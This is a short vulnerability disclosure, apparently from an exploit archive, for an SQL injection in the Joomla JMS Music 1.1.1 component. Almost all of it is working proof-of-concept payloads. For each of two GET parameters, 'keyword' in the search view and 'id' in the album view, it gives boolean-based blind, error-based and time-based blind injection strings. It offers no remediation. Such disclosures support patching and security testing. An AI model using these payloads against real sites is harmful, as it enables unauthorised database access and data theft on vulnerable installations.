Joomla! Component JMS Music 1.1.1 – SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&keyword=[SQL] Parameter: keyword (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: option=com_jmsmusic&view=search&keyword=-5694' OR 3737=3737# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_jmsmusic&view=search&keyword=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: option=com_jmsmusic&view=search&keyword=Efe' OR SLEEP(5)-- EoWI 2) http://localhost/[PATH]/index.php?option=com_jmsmusic&view=album&id=[SQL] Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: option=com_jmsmusic&view=album&id=-5694' OR 3737=3737# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_jmsmusic&view=album&id=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: option=com_jmsmusic&view=album&id=Efe' OR SLEEP(5)-- EoWI